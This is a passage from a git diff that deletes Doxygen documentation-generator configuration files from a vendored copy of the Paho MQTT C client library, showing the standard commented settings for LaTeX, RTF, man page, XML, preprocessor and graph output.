-
-LATEX_FOOTER           =
-
-# If the PDF_HYPERLINKS tag is set to YES, the LaTeX that is generated
-# is prepared for conversion to pdf (using ps2pdf). The pdf file will
-# contain links (just like the HTML output) instead of page references
-# This makes the output suitable for online browsing using a pdf viewer.
-
-PDF_HYPERLINKS         = YES
-
-# If the USE_PDFLATEX tag is set to YES, pdflatex will be used instead of
-# plain latex in the generated Makefile. Set this option to YES to get a
-# higher quality PDF documentation.
-
-USE_PDFLATEX           = YES
-
-# If the LATEX_BATCHMODE tag is set to YES, doxygen will add the \\batchmode
-# command to the generated LaTeX files. This will instruct LaTeX to keep
-# running if errors occur, instead of asking the user for help.
-# This option is also used when generating formulas in HTML.
-
-LATEX_BATCHMODE        = NO
-
-# If LATEX_HIDE_INDICES is set to YES then doxygen will not
-# include the index chapters (such as File Index, Compound Index, etc.)
-# in the output.
-
-LATEX_HIDE_INDICES     = NO
-
-# If LATEX_SOURCE_CODE is set to YES then doxygen will include
-# source code with syntax highlighting in the LaTeX output.
-# Note that which sources are shown also depends on other settings
-# such as SOURCE_BROWSER.
-
-LATEX_SOURCE_CODE      = NO
-
-# The LATEX_BIB_STYLE tag can be used to specify the style to use for the
-# bibliography, e.g. plainnat, or ieeetr. The default style is "plain". See
-# http://en.wikipedia.org/wiki/BibTeX for more info.
-
-LATEX_BIB_STYLE        = plain
-
-#---------------------------------------------------------------------------
-# configuration options related to the RTF output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_RTF tag is set to YES Doxygen will generate RTF output
-# The RTF output is optimized for Word 97 and may not look very pretty with
-# other RTF readers or editors.
-
-GENERATE_RTF           = NO
-
-# The RTF_OUTPUT tag is used to specify where the RTF docs will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `rtf' will be used as the default path.
-
-RTF_OUTPUT             = rtf
-
-# If the COMPACT_RTF tag is set to YES Doxygen generates more compact
-# RTF documents. This may be useful for small projects and may help to
-# save some trees in general.
-
-COMPACT_RTF            = NO
-
-# If the RTF_HYPERLINKS tag is set to YES, the RTF that is generated
-# will contain hyperlink fields. The RTF file will
-# contain links (just like the HTML output) instead of page references.
-# This makes the output suitable for online browsing using WORD or other
-# programs which support those fields.
-# Note: wordpad (write) and others do not support links.
-
-RTF_HYPERLINKS         = NO
-
-# Load style sheet definitions from file. Syntax is similar to doxygen's
-# config file, i.e. a series of assignments. You only have to provide
-# replacements, missing definitions are set to their default value.
-
-RTF_STYLESHEET_FILE    =
-
-# Set optional variables used in the generation of an rtf document.
-# Syntax is similar to doxygen's config file.
-
-RTF_EXTENSIONS_FILE    =
-
-#---------------------------------------------------------------------------
-# configuration options related to the man page output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_MAN tag is set to YES (the default) Doxygen will
-# generate man pages
-
-GENERATE_MAN           = NO
-
-# The MAN_OUTPUT tag is used to specify where the man pages will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `man' will be used as the default path.
-
-MAN_OUTPUT             = man
-
-# The MAN_EXTENSION tag determines the extension that is added to
-# the generated man pages (default is the subroutine's section .3)
-
-MAN_EXTENSION          = .3
-
-# If the MAN_LINKS tag is set to YES and Doxygen generates man output,
-# then it will generate one additional man file for each entity
-# documented in the real man page(s). These additional files
-# only source the real man page, but without them the man command
-# would be unable to find the correct page. The default is NO.
-
-MAN_LINKS              = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the XML output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_XML tag is set to YES Doxygen will
-# generate an XML file that captures the structure of
-# the code including all documentation.
-
-GENERATE_XML           = NO
-
-# The XML_OUTPUT tag is used to specify where the XML pages will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `xml' will be used as the default path.
-
-XML_OUTPUT             = xml
-
-# The XML_SCHEMA tag can be used to specify an XML schema,
-# which can be used by a validating XML parser to check the
-# syntax of the XML files.
-
-XML_SCHEMA             =
-
-# The XML_DTD tag can be used to specify an XML DTD,
-# which can be used by a validating XML parser to check the
-# syntax of the XML files.
-
-XML_DTD                =
-
-# If the XML_PROGRAMLISTING tag is set to YES Doxygen will
-# dump the program listings (including syntax highlighting
-# and cross-referencing information) to the XML output. Note that
-# enabling this will significantly increase the size of the XML output.
-
-XML_PROGRAMLISTING     = YES
-
-#---------------------------------------------------------------------------
-# configuration options for the AutoGen Definitions output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_AUTOGEN_DEF tag is set to YES Doxygen will
-# generate an AutoGen Definitions (see autogen.sf.net) file
-# that captures the structure of the code including all
-# documentation. Note that this feature is still experimental
-# and incomplete at the moment.
-
-GENERATE_AUTOGEN_DEF   = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the Perl module output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_PERLMOD tag is set to YES Doxygen will
-# generate a Perl module file that captures the structure of
-# the code including all documentation. Note that this
-# feature is still experimental and incomplete at the
-# moment.
-
-GENERATE_PERLMOD       = NO
-
-# If the PERLMOD_LATEX tag is set to YES Doxygen will generate
-# the necessary Makefile rules, Perl scripts and LaTeX code to be able
-# to generate PDF and DVI output from the Perl module output.
-
-PERLMOD_LATEX          = NO
-
-# If the PERLMOD_PRETTY tag is set to YES the Perl module output will be
-# nicely formatted so it can be parsed by a human reader.
-# This is useful
-# if you want to understand what is going on.
-# On the other hand, if this
-# tag is set to NO the size of the Perl module output will be much smaller
-# and Perl will parse it just the same.
-
-PERLMOD_PRETTY         = YES
-
-# The names of the make variables in the generated doxyrules.make file
-# are prefixed with the string contained in PERLMOD_MAKEVAR_PREFIX.
-# This is useful so different doxyrules.make files included by the same
-# Makefile don't overwrite each other's variables.
-
-PERLMOD_MAKEVAR_PREFIX =
-
-#---------------------------------------------------------------------------
-# Configuration options related to the preprocessor
-#---------------------------------------------------------------------------
-
-# If the ENABLE_PREPROCESSING tag is set to YES (the default) Doxygen will
-# evaluate all C-preprocessor directives found in the sources and include
-# files.
-
-ENABLE_PREPROCESSING   = YES
-
-# If the MACRO_EXPANSION tag is set to YES Doxygen will expand all macro
-# names in the source code. If set to NO (the default) only conditional
-# compilation will be performed. Macro expansion can be done in a controlled
-# way by setting EXPAND_ONLY_PREDEF to YES.
-
-MACRO_EXPANSION        = YES
-
-# If the EXPAND_ONLY_PREDEF and MACRO_EXPANSION tags are both set to YES
-# then the macro expansion is limited to the macros specified with the
-# PREDEFINED and EXPAND_AS_DEFINED tags.
-
-EXPAND_ONLY_PREDEF     = NO
-
-# If the SEARCH_INCLUDES tag is set to YES (the default) the includes files
-# pointed to by INCLUDE_PATH will be searched when a #include is found.
-
-SEARCH_INCLUDES        = YES
-
-# The INCLUDE_PATH tag can be used to specify one or more directories that
-# contain include files that are not input files but should be processed by
-# the preprocessor.
-
-INCLUDE_PATH           =
-
-# You can use the INCLUDE_FILE_PATTERNS tag to specify one or more wildcard
-# patterns (like *.h and *.hpp) to filter out the header-files in the
-# directories. If left blank, the patterns specified with FILE_PATTERNS will
-# be used.
-
-INCLUDE_FILE_PATTERNS  =
-
-# The PREDEFINED tag can be used to specify one or more macro names that
-# are defined before the preprocessor is started (similar to the -D option of
-# gcc). The argument of the tag is a list of macros of the form: name
-# or name=definition (no spaces). If the definition and the = are
-# omitted =1 is assumed. To prevent a macro definition from being
-# undefined via #undef or recursively expanded use the := operator
-# instead of the = operator.
-
-PREDEFINED             = __attribute__(x)=
-
-# If the MACRO_EXPANSION and EXPAND_ONLY_PREDEF tags are set to YES then
-# this tag can be used to specify a list of macro names that should be expanded.
-# The macro definition that is found in the sources will be used.
-# Use the PREDEFINED tag if you want to use a different macro definition that
-# overrules the definition found in the source code.
-
-EXPAND_AS_DEFINED      =
-
-# If the SKIP_FUNCTION_MACROS tag is set to YES (the default) then
-# doxygen's preprocessor will remove all references to function-like macros
-# that are alone on a line, have an all uppercase name, and do not end with a
-# semicolon, because these will confuse the parser if not removed.
-
-SKIP_FUNCTION_MACROS   = YES
-
-#---------------------------------------------------------------------------
-# Configuration::additions related to external references
-#---------------------------------------------------------------------------
-
-# The TAGFILES option can be used to specify one or more tagfiles. For each
-# tag file the location of the external documentation should be added. The
-# format of a tag file without this location is as follows:
-#
-# TAGFILES = file1 file2 ...
-# Adding location for the tag files is done as follows:
-#
-# TAGFILES = file1=loc1 "file2 = loc2" ...
-# where "loc1" and "loc2" can be relative or absolute paths
-# or URLs. Note that each tag file must have a unique name (where the name does
-# NOT include the path). If a tag file is not located in the directory in which
-# doxygen is run, you must also specify the path to the tagfile here.
-
-TAGFILES               =
-
-# When a file name is specified after GENERATE_TAGFILE, doxygen will create
-# a tag file that is based on the input files it reads.
-
-GENERATE_TAGFILE       =
-
-# If the ALLEXTERNALS tag is set to YES all external classes will be listed
-# in the class index. If set to NO only the inherited external classes
-# will be listed.
-
-ALLEXTERNALS           = NO
-
-# If the EXTERNAL_GROUPS tag is set to YES all external groups will be listed
-# in the modules index. If set to NO, only the current project's groups will
-# be listed.
-
-EXTERNAL_GROUPS        = YES
-
-# The PERL_PATH should be the absolute path and name of the perl script
-# interpreter (i.e. the result of `which perl').
-
-PERL_PATH              = /usr/bin/perl
-
-#---------------------------------------------------------------------------
-# Configuration options related to the dot tool
-#---------------------------------------------------------------------------
-
-# If the CLASS_DIAGRAMS tag is set to YES (the default) Doxygen will
-# generate a inheritance diagram (in HTML, RTF and LaTeX) for classes with base
-# or super classes. Setting the tag to NO turns the diagrams off. Note that
-# this option also works with HAVE_DOT disabled, but it is recommended to
-# install and use dot, since it yields more powerful graphs.
-
-CLASS_DIAGRAMS         = NO
-
-# You can define message sequence charts within doxygen comments using the \msc
-# command. Doxygen will then run the mscgen tool (see
-# http://www.mcternan.me.uk/mscgen/) to produce the chart and insert it in the
-# documentation. The MSCGEN_PATH tag allows you to specify the directory where
-# the mscgen tool resides. If left empty the tool is assumed to be found in the
-# default search path.
-
-MSCGEN_PATH            =
-
-# If set to YES, the inheritance and collaboration graphs will hide
-# inheritance and usage relations if the target is undocumented
-# or is not a class.
-
-HIDE_UNDOC_RELATIONS   = YES
-
-# If you set the HAVE_DOT tag to YES then doxygen will assume the dot tool is
-# available from the path. This tool is part of Graphviz, a graph visualization
-# toolkit from AT&T and Lucent Bell Labs. The other options in this section
-# have no effect if this option is set to NO (the default)
-
-HAVE_DOT               = NO
-
-# The DOT_NUM_THREADS specifies the number of dot invocations doxygen is
-# allowed to run in parallel. When set to 0 (the default) doxygen will
-# base this on the number of processors available in the system. You can set it
-# explicitly to a value larger than 0 to get control over the balance
-# between CPU load and processing speed.
-
-DOT_NUM_THREADS        = 0
-
-# By default doxygen will use the Helvetica font for all dot files that
-# doxygen generates. When you want a differently looking font you can specify
-# the font name using DOT_FONTNAME. You need to make sure dot is able to find
-# the font, which can be done by putting it in a standard location or by setting
-# the DOTFONTPATH environment variable or by setting DOT_FONTPATH to the
-# directory containing the font.
-
-DOT_FONTNAME           = FreeSans
-
-# The DOT_FONTSIZE tag can be used to set the size of the font of dot graphs.
-# The default size is 10pt.
-
-DOT_FONTSIZE           = 10
-
-# By default doxygen will tell dot to use the Helvetica font.
-# If you specify a different font using DOT_FONTNAME you can use DOT_FONTPATH to
-# set the path where dot can find it.
-
-DOT_FONTPATH           =
-
-# If the CLASS_GRAPH and HAVE_DOT tags are set to YES then doxygen
-# will generate a graph for each documented class showing the direct and
-# indirect inheritance relations. Setting this tag to YES will force the
-# CLASS_DIAGRAMS tag to NO.
-
-CLASS_GRAPH            = YES
-
-# If the COLLABORATION_GRAPH and HAVE_DOT tags are set to YES then doxygen
-# will generate a graph for each documented class showing the direct and
-# indirect implementation dependencies (inheritance, containment, and
-# class references variables) of the class with other documented classes.
-
-COLLABORATION_GRAPH    = YES
-
-# If the GROUP_GRAPHS and HAVE_DOT tags are set to YES then doxygen
-# will generate a graph for groups, showing the direct groups dependencies
-
-GROUP_GRAPHS           = YES
-
-# If the UML_LOOK tag is set to YES doxygen will generate inheritance and
-# collaboration diagrams in a style similar to the OMG's Unified Modeling
-# Language.
-
-UML_LOOK               = NO
-
-# If the UML_LOOK tag is enabled, the fields and methods are shown inside
-# the class node. If there are many fields or methods and many nodes the
-# graph may become too big to be useful. The UML_LIMIT_NUM_FIELDS
-# threshold limits the number of items for each type to make the size more
-# manageable. Set this to 0 for no limit. Note that the threshold may be
-# exceeded by 50% before the limit is enforced.
-
-UML_LIMIT_NUM_FIELDS   = 10
-
-# If set to YES, the inheritance and collaboration graphs will show the
-# relations between templates and their instances.
-
-TEMPLATE_RELATIONS     = NO
-
-# If the ENABLE_PREPROCESSING, SEARCH_INCLUDES, INCLUDE_GRAPH, and HAVE_DOT
-# tags are set to YES then doxygen will generate a graph for each documented
-# file showing the direct and indirect include dependencies of the file with
-# other documented files.
-
-INCLUDE_GRAPH          = YES
-
-# If the ENABLE_PREPROCESSING, SEARCH_INCLUDES, INCLUDED_BY_GRAPH, and
-# HAVE_DOT tags are set to YES then doxygen will generate a graph for each
-# documented header file showing the documented files that directly or
-# indirectly include this file.
-
-INCLUDED_BY_GRAPH      = YES
-
-# If the CALL_GRAPH and HAVE_DOT options are set to YES then
-# doxygen will generate a call dependency graph for every global function
-# or class method. Note that enabling this option will significantly increase
-# the time of a run. So in most cases it will be better to enable call graphs
-# for selected functions only using the \callgraph command.
-
-CALL_GRAPH             = YES
-
-# If the CALLER_GRAPH and HAVE_DOT tags are set to YES then
-# doxygen will generate a caller dependency graph for every global function
-# or class method. Note that enabling this option will significantly increase
-# the time of a run. So in most cases it will be better to enable caller
-# graphs for selected functions only using the \callergraph command.
-
-CALLER_GRAPH           = YES
-
-# If the GRAPHICAL_HIERARCHY and HAVE_DOT tags are set to YES then doxygen
-# will generate a graphical hierarchy of all classes instead of a textual one.
-
-GRAPHICAL_HIERARCHY    = YES
-
-# If the DIRECTORY_GRAPH and HAVE_DOT tags are set to YES
-# then doxygen will show the dependencies a directory has on other directories
-# in a graphical way. The dependency relations are determined by the #include
-# relations between the files in the directories.
-
-DIRECTORY_GRAPH        = YES
-
-# The DOT_IMAGE_FORMAT tag can be used to set the image format of the images
-# generated by dot. Possible values are svg, png, jpg, or gif.
-# If left blank png will be used. If you choose svg you need to set
-# HTML_FILE_EXTENSION to xhtml in order to make the SVG files
-# visible in IE 9+ (other browsers do not have this requirement).
-
-DOT_IMAGE_FORMAT       = png
-
-# If DOT_IMAGE_FORMAT is set to svg, then this option can be set to YES to
-# enable generation of interactive SVG images that allow zooming and panning.
-# Note that this requires a modern browser other than Internet Explorer.
-# Tested and working are Firefox, Chrome, Safari, and Opera. For IE 9+ you
-# need to set HTML_FILE_EXTENSION to xhtml in order to make the SVG files
-# visible. Older versions of IE do not have SVG support.
-
-INTERACTIVE_SVG        = NO
-
-# The tag DOT_PATH can be used to specify the path where the dot tool can be
-# found. If left blank, it is assumed the dot tool can be found in the path.
-
-DOT_PATH               =
-
-# The DOTFILE_DIRS tag can be used to specify one or more directories that
-# contain dot files that are included in the documentation (see the
-# \dotfile command).
-
-DOTFILE_DIRS           =
-
-# The MSCFILE_DIRS tag can be used to specify one or more directories that
-# contain msc files that are included in the documentation (see the
-# \mscfile command).
-
-MSCFILE_DIRS           =
-
-# The DOT_GRAPH_MAX_NODES tag can be used to set the maximum number of
-# nodes that will be shown in the graph. If the number of nodes in a graph
-# becomes larger than this value, doxygen will truncate the graph, which is
-# visualized by representing a node as a red box. Note that if the
-# number of direct children of the root node in a graph is already larger than
-# DOT_GRAPH_MAX_NODES then the graph will not be shown at all. Also note
-# that the size of a graph can be further restricted by MAX_DOT_GRAPH_DEPTH.
-
-DOT_GRAPH_MAX_NODES    = 50
-
-# The MAX_DOT_GRAPH_DEPTH tag can be used to set the maximum depth of the
-# graphs generated by dot. A depth value of 3 means that only nodes reachable
-# from the root by following a path via at most 3 edges will be shown. Nodes
-# that lay further from the root node will be omitted. Note that setting this
-# option to 1 or 2 may greatly reduce the computation time needed for large
-# code bases. Also note that the size of a graph can be further restricted by
-# DOT_GRAPH_MAX_NODES. Using a depth of 0 means no depth restriction.
-
-MAX_DOT_GRAPH_DEPTH    = 0
-
-# Set the DOT_TRANSPARENT tag to YES to generate images with a transparent
-# background. This is disabled by default, because dot on Windows does not
-# seem to support this out of the box. Warning: Depending on the platform used,
-# enabling this option may lead to badly anti-aliased labels on the edges of
-# a graph (i.e. they become hard to read).
-
-DOT_TRANSPARENT        = NO
-
-# Set the DOT_MULTI_TARGETS tag to YES allow dot to generate multiple output
-# files in one run (i.e. multiple -o and -T options on the command line). This
-# makes dot run faster, but since only newer versions of dot (>1.8.10)
-# support this, this feature is disabled by default.
-
-DOT_MULTI_TARGETS      = NO
-
-# If the GENERATE_LEGEND tag is set to YES (the default) Doxygen will
-# generate a legend page explaining the meaning of the various boxes and
-# arrows in the dot generated graphs.
-
-GENERATE_LEGEND        = YES
-
-# If the DOT_CLEANUP tag is set to YES (the default) Doxygen will
-# remove the intermediate dot files that are used to generate
-# the various graphs.
-
-DOT_CLEANUP            = YES
diff --git a/thirdparty/paho.mqtt.c/doc/DoxyfileV3AsyncAPI.in b/thirdparty/paho.mqtt.c/doc/DoxyfileV3AsyncAPI.in
deleted file mode 100644
index e2ed5ae..0000000
--- a/thirdparty/paho.mqtt.c/doc/DoxyfileV3AsyncAPI.in
+++ /dev/null
@@ -1,1804 +0,0 @@
-# Doxyfile 1.8.1.2
-
-# This file describes the settings to be used by the documentation system
-# doxygen (www.doxygen.org) for a project.
-#
-# All text after a hash (#) is considered a comment and will be ignored.
-# The format is:
-#       TAG = value [value, ...]
-# For lists items can also be appended using:
-#       TAG += value [value, ...]
-# Values that contain spaces should be placed between quotes (" ").
-
-#---------------------------------------------------------------------------
-# Project related configuration options
-#---------------------------------------------------------------------------
-
-# This tag specifies the encoding used for all characters in the config file
-# that follow. The default is UTF-8 which is also the encoding used for all
-# text before the first occurrence of this tag. Doxygen uses libiconv (or the
-# iconv built into libc) for the transcoding. See
-# http://www.gnu.org/software/libiconv for the list of possible encodings.
-
-DOXYFILE_ENCODING      = UTF-8
-
-# The PROJECT_NAME tag is a single word (or sequence of words) that should
-# identify the project. Note that if you do not use Doxywizard you need
-# to put quotes around the project name if it contains spaces.
-
-PROJECT_NAME           = "Paho Asynchronous MQTT C Client Library"
-
-# The PROJECT_NUMBER tag can be used to enter a project or revision number.
-# This could be handy for archiving the generated documentation or
-# if some version control system is used.
-
-PROJECT_NUMBER         =
-
-# Using the PROJECT_BRIEF tag one can provide an optional one line description
-# for a project that appears at the top of each page and should give viewer
-# a quick idea about the purpose of the project. Keep the description short.
-
-PROJECT_BRIEF          =
-
-# With the PROJECT_LOGO tag one can specify an logo or icon that is
-# included in the documentation. The maximum height of the logo should not
-# exceed 55 pixels and the maximum width should not exceed 200 pixels.
-# Doxygen will copy the logo to the output directory.
-
-PROJECT_LOGO           = "@PROJECT_SOURCE_DIR@/doc/pahologo.png"
-
-# The OUTPUT_DIRECTORY tag is used to specify the (relative or absolute)
-# base path where the generated documentation will be put.
-# If a relative path is entered, it will be relative to the location
-# where doxygen was started. If left blank the current directory will be used.
-
-OUTPUT_DIRECTORY       = "@CMAKE_CURRENT_BINARY_DIR@/doc/MQTTAsync/"
-
-# If the CREATE_SUBDIRS tag is set to YES, then doxygen will create
-# 4096 sub-directories (in 2 levels) under the output directory of each output
-# format and will distribute the generated files over these directories.
-# Enabling this option can be useful when feeding doxygen a huge amount of
-# source files, where putting all generated files in the same directory would
-# otherwise cause performance problems for the file system.
-
-CREATE_SUBDIRS         = NO
-
-# The OUTPUT_LANGUAGE tag is used to specify the language in which all
-# documentation generated by doxygen is written. Doxygen will use this
-# information to generate all constant output in the proper language.
-# The default language is English, other supported languages are:
-# Afrikaans, Arabic, Brazilian, Catalan, Chinese, Chinese-Traditional,
-# Croatian, Czech, Danish, Dutch, Esperanto, Farsi, Finnish, French, German,
-# Greek, Hungarian, Italian, Japanese, Japanese-en (Japanese with English
-# messages), Korean, Korean-en, Lithuanian, Norwegian, Macedonian, Persian,
-# Polish, Portuguese, Romanian, Russian, Serbian, Serbian-Cyrillic, Slovak,
-# Slovene, Spanish, Swedish, Ukrainian, and Vietnamese.
-
-OUTPUT_LANGUAGE        = English
-
-# If the BRIEF_MEMBER_DESC tag is set to YES (the default) Doxygen will
-# include brief member descriptions after the members that are listed in
-# the file and class documentation (similar to JavaDoc).
-# Set to NO to disable this.
-
-BRIEF_MEMBER_DESC      = YES
-
-# If the REPEAT_BRIEF tag is set to YES (the default) Doxygen will prepend
-# the brief description of a member or function before the detailed description.
-# Note: if both HIDE_UNDOC_MEMBERS and BRIEF_MEMBER_DESC are set to NO, the
-# brief descriptions will be completely suppressed.
-
-REPEAT_BRIEF           = YES
-
-# This tag implements a quasi-intelligent brief description abbreviator
-# that is used to form the text in various listings. Each string
-# in this list, if found as the leading text of the brief description, will be
-# stripped from the text and the result after processing the whole list, is
-# used as the annotated text. Otherwise, the brief description is used as-is.
-# If left blank, the following values are used ("$name" is automatically
-# replaced with the name of the entity): "The $name class" "The $name widget"
-# "The $name file" "is" "provides" "specifies" "contains"
-# "represents" "a" "an" "the"
-
-ABBREVIATE_BRIEF       = "The $name class" \
-                         "The $name widget" \
-                         "The $name file" \
-                         is \
-                         provides \
-                         specifies \
-                         contains \
-                         represents \
-                         a \
-                         an \
-                         the
-
-# If the ALWAYS_DETAILED_SEC and REPEAT_BRIEF tags are both set to YES then
-# Doxygen will generate a detailed section even if there is only a brief
-# description.
-
-ALWAYS_DETAILED_SEC    = NO
-
-# If the INLINE_INHERITED_MEMB tag is set to YES, doxygen will show all
-# inherited members of a class in the documentation of that class as if those
-# members were ordinary class members. Constructors, destructors and assignment
-# operators of the base classes will not be shown.
-
-INLINE_INHERITED_MEMB  = NO
-
-# If the FULL_PATH_NAMES tag is set to YES then Doxygen will prepend the full
-# path before files name in the file list and in the header files. If set
-# to NO the shortest path that makes the file name unique will be used.
-
-FULL_PATH_NAMES        = NO
-
-# If the FULL_PATH_NAMES tag is set to YES then the STRIP_FROM_PATH tag
-# can be used to strip a user-defined part of the path. Stripping is
-# only done if one of the specified strings matches the left-hand part of
-# the path. The tag can be used to show relative paths in the file list.
-# If left blank the directory from which doxygen is run is used as the
-# path to strip.
-
-STRIP_FROM_PATH        = /Users/dimitri/doxygen/mail/1.5.7/doxywizard/
-
-# The STRIP_FROM_INC_PATH tag can be used to strip a user-defined part of
-# the path mentioned in the documentation of a class, which tells
-# the reader which header file to include in order to use a class.
-# If left blank only the name of the header file containing the class
-# definition is used. Otherwise one should specify the include paths that
-# are normally passed to the compiler using the -I flag.
-
-STRIP_FROM_INC_PATH    =
-
-# If the SHORT_NAMES tag is set to YES, doxygen will generate much shorter
-# (but less readable) file names. This can be useful if your file system
-# doesn't support long names like on DOS, Mac, or CD-ROM.
-
-SHORT_NAMES            = NO
-
-# If the JAVADOC_AUTOBRIEF tag is set to YES then Doxygen
-# will interpret the first line (until the first dot) of a JavaDoc-style
-# comment as the brief description. If set to NO, the JavaDoc
-# comments will behave just like regular Qt-style comments
-# (thus requiring an explicit @brief command for a brief description.)
-
-JAVADOC_AUTOBRIEF      = NO
-
-# If the QT_AUTOBRIEF tag is set to YES then Doxygen will
-# interpret the first line (until the first dot) of a Qt-style
-# comment as the brief description. If set to NO, the comments
-# will behave just like regular Qt-style comments (thus requiring
-# an explicit \brief command for a brief description.)
-
-QT_AUTOBRIEF           = NO
-
-# The MULTILINE_CPP_IS_BRIEF tag can be set to YES to make Doxygen
-# treat a multi-line C++ special comment block (i.e. a block of //! or ///
-# comments) as a brief description. This used to be the default behaviour.
-# The new default is to treat a multi-line C++ comment block as a detailed
-# description. Set this tag to YES if you prefer the old behaviour instead.
-
-MULTILINE_CPP_IS_BRIEF = NO
-
-# If the INHERIT_DOCS tag is set to YES (the default) then an undocumented
-# member inherits the documentation from any documented member that it
-# re-implements.
-
-INHERIT_DOCS           = YES
-
-# If the SEPARATE_MEMBER_PAGES tag is set to YES, then doxygen will produce
-# a new page for each member. If set to NO, the documentation of a member will
-# be part of the file/class/namespace that contains it.
-
-SEPARATE_MEMBER_PAGES  = NO
-
-# The TAB_SIZE tag can be used to set the number of spaces in a tab.
-# Doxygen uses this value to replace tabs by spaces in code fragments.
-
-TAB_SIZE               = 8
-
-# This tag can be used to specify a number of aliases that acts
-# as commands in the documentation. An alias has the form "name=value".
-# For example adding "sideeffect=\par Side Effects:\n" will allow you to
-# put the command \sideeffect (or @sideeffect) in the documentation, which
-# will result in a user-defined paragraph with heading "Side Effects:".
-# You can put \n's in the value part of an alias to insert newlines.
-
-ALIASES                =
-
-# This tag can be used to specify a number of word-keyword mappings (TCL only).
-# A mapping has the form "name=value". For example adding
-# "class=itcl::class" will allow you to use the command class in the
-# itcl::class meaning.
-
-TCL_SUBST              =
-
-# Set the OPTIMIZE_OUTPUT_FOR_C tag to YES if your project consists of C
-# sources only. Doxygen will then generate output that is more tailored for C.
-# For instance, some of the names that are used will be different. The list
-# of all members will be omitted, etc.
-
-OPTIMIZE_OUTPUT_FOR_C  = YES
-
-# Set the OPTIMIZE_OUTPUT_JAVA tag to YES if your project consists of Java
-# sources only. Doxygen will then generate output that is more tailored for
-# Java. For instance, namespaces will be presented as packages, qualified
-# scopes will look different, etc.
-
-OPTIMIZE_OUTPUT_JAVA   = NO
-
-# Set the OPTIMIZE_FOR_FORTRAN tag to YES if your project consists of Fortran
-# sources only. Doxygen will then generate output that is more tailored for
-# Fortran.
-
-OPTIMIZE_FOR_FORTRAN   = NO
-
-# Set the OPTIMIZE_OUTPUT_VHDL tag to YES if your project consists of VHDL
-# sources. Doxygen will then generate output that is tailored for
-# VHDL.
-
-OPTIMIZE_OUTPUT_VHDL   = NO
-
-# Doxygen selects the parser to use depending on the extension of the files it
-# parses. With this tag you can assign which parser to use for a given extension.
-# Doxygen has a built-in mapping, but you can override or extend it using this
-# tag. The format is ext=language, where ext is a file extension, and language
-# is one of the parsers supported by doxygen: IDL, Java, Javascript, CSharp, C,
-# C++, D, PHP, Objective-C, Python, Fortran, VHDL, C, C++. For instance to make
-# doxygen treat .inc files as Fortran files (default is PHP), and .f files as C
-# (default is Fortran), use: inc=Fortran f=C. Note that for custom extensions
-# you also need to set FILE_PATTERNS otherwise the files are not read by doxygen.
-
-EXTENSION_MAPPING      =
-
-# If MARKDOWN_SUPPORT is enabled (the default) then doxygen pre-processes all
-# comments according to the Markdown format, which allows for more readable
-# documentation. See http://daringfireball.net/projects/markdown/ for details.
-# The output of markdown processing is further processed by doxygen, so you
-# can mix doxygen, HTML, and XML commands with Markdown formatting.
-# Disable only in case of backward compatibilities issues.
-
-MARKDOWN_SUPPORT       = YES
-
-# If you use STL classes (i.e. std::string, std::vector, etc.) but do not want
-# to include (a tag file for) the STL sources as input, then you should
-# set this tag to YES in order to let doxygen match functions declarations and
-# definitions whose arguments contain STL classes (e.g. func(std::string); v.s.
-# func(std::string) {}). This also makes the inheritance and collaboration
-# diagrams that involve STL classes more complete and accurate.
-
-BUILTIN_STL_SUPPORT    = NO
-
-# If you use Microsoft's C++/CLI language, you should set this option to YES to
-# enable parsing support.
-
-CPP_CLI_SUPPORT        = NO
-
-# Set the SIP_SUPPORT tag to YES if your project consists of sip sources only.
-# Doxygen will parse them like normal C++ but will assume all classes use public
-# instead of private inheritance when no explicit protection keyword is present.
-
-SIP_SUPPORT            = NO
-
-# For Microsoft's IDL there are propget and propput attributes to indicate getter
-# and setter methods for a property. Setting this option to YES (the default)
-# will make doxygen replace the get and set methods by a property in the
-# documentation. This will only work if the methods are indeed getting or
-# setting a simple type. If this is not the case, or you want to show the
-# methods anyway, you should set this option to NO.
-
-IDL_PROPERTY_SUPPORT   = YES
-
-# If member grouping is used in the documentation and the DISTRIBUTE_GROUP_DOC
-# tag is set to YES, then doxygen will reuse the documentation of the first
-# member in the group (if any) for the other members of the group. By default
-# all members of a group must be documented explicitly.
-
-DISTRIBUTE_GROUP_DOC   = NO
-
-# Set the SUBGROUPING tag to YES (the default) to allow class member groups of
-# the same type (for instance a group of public functions) to be put as a
-# subgroup of that type (e.g. under the Public Functions section). Set it to
-# NO to prevent subgrouping. Alternatively, this can be done per class using
-# the \nosubgrouping command.
-
-SUBGROUPING            = YES
-
-# When the INLINE_GROUPED_CLASSES tag is set to YES, classes, structs and
-# unions are shown inside the group in which they are included (e.g. using
-# @ingroup) instead of on a separate page (for HTML and Man pages) or
-# section (for LaTeX and RTF).
-
-INLINE_GROUPED_CLASSES = NO
-
-# When the INLINE_SIMPLE_STRUCTS tag is set to YES, structs, classes, and
-# unions with only public data fields will be shown inline in the documentation
-# of the scope in which they are defined (i.e. file, namespace, or group
-# documentation), provided this scope is documented. If set to NO (the default),
-# structs, classes, and unions are shown on a separate page (for HTML and Man
-# pages) or section (for LaTeX and RTF).
-
-INLINE_SIMPLE_STRUCTS  = NO
-
-# When TYPEDEF_HIDES_STRUCT is enabled, a typedef of a struct, union, or enum
-# is documented as struct, union, or enum with the name of the typedef. So
-# typedef struct TypeS {} TypeT, will appear in the documentation as a struct
-# with name TypeT. When disabled the typedef will appear as a member of a file,
-# namespace, or class. And the struct will be named TypeS. This can typically
-# be useful for C code in case the coding convention dictates that all compound
-# types are typedef'ed and only the typedef is referenced, never the tag name.
-
-TYPEDEF_HIDES_STRUCT   = NO
-
-# The SYMBOL_CACHE_SIZE determines the size of the internal cache use to
-# determine which symbols to keep in memory and which to flush to disk.
-# When the cache is full, less often used symbols will be written to disk.
-# For small to medium size projects (<1000 input files) the default value is
-# probably good enough. For larger projects a too small cache size can cause
-# doxygen to be busy swapping symbols to and from disk most of the time
-# causing a significant performance penalty.
-# If the system has enough physical memory increasing the cache will improve the
